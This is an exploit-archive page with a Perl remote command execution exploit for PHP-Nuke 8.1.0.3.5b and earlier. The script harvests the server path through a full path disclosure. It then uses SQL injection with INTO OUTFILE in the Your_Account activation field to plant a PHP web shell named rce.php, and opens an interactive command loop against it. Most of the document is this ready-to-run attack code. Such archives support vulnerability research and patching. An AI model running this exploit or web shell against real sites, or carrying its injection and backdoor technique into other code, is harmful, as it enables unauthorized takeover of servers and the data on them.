PHP-Nuke 8.1.0.3.5b - Remote Command Execution

EDB-ID:

14319

CVE:

N/A

EDB Verified:

Author:

yawn

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-07-10

Vulnerable App: 
# PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit
# Author/s: Dante90 & yawn
# Contact Us: www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net

#	You will remember, Watson, how the dreadful business of the
#   	Abernetty family was first brought to my notice by the depth which the
#   	parsley had sunk into the butter upon a hot day.
#		                                        -- Sherlock Holmes

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;

sub Nuke::Usage {
	print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit\n";
	print " ------------------------------------------------------ \n";
	print " * USAGE:                                             *\n";
	print " * cd [Local Disk]:\\                                  *\n";
	print " * perl name_exploit.pl [host] [username] [password]  *\n";
	print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <-  *\n";
	print " ------------------------------------------------------ \n";
	print " *             Powered By Dante90 & yawn              *\n";
	print " *  	               www.unitx.net                  *\n";
	print " ------------------------------------------------------ \n";
}

#VARS
system $^O eq 'MSWin32' ? 'cls' : 'clear';
Nuke::Usage();
my $host = shift || die;
my $cmd;
my $shell = "<?php echo system(\$_GET[\"cmd\"]); ?>"; # Change Here to
Set your custom shell (for example use system() );
my $cookies = HTTP::Cookies->new;
my $request = LWP::UserAgent->new;
$request->agent("Mozilla 5/0");
$request->cookie_jar($cookies);
#END VARS
sub Full_Path_Disclosure() {
	my $Get = $request->get($host.'themes/NukeNews/theme.php');
	if ($Get->content =~ /No such file or directory in <b>(.+?)<\/b> on line/i) {
		return $1;
	} else {
		return "failed";
	}
}

print " * Getting Full Path\n";
my $path = Full_Path_Disclosure();
die " * Failed Path Extraction" if ($path eq "failed");
$path =~ s/themes(\/|\\)NukeNews(\/|\\)theme.php//g;
print " * Full Path Found: $path\n";
if ($path =~ m/\\/) {
	$path =~ s/\\/\\\\\\\\/g;
}
print " * Injecting Shell To $host\n";
my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF",
	{
		check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM
`nuke_authors` INTO OUTFILE '$path"."rce.php",
	},
	Referer => $host."index.php");
print " * Injecting Successfully Completed\n";
print " * Shell now available on $host"."rce.php\n";
print " * Connecting to remote shell\n";
sleep(4);
print " * Connected.. Type \"quit\" to quit\n";
while() {
		print "* root\@backdoor ~\$ ";
		$cmd = <>;
		chomp($cmd);
		last if $cmd eq "quit";
		$req2 = $request->get($host."/rce.php?cmd=".$cmd);
		print $req2->content."\n";
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services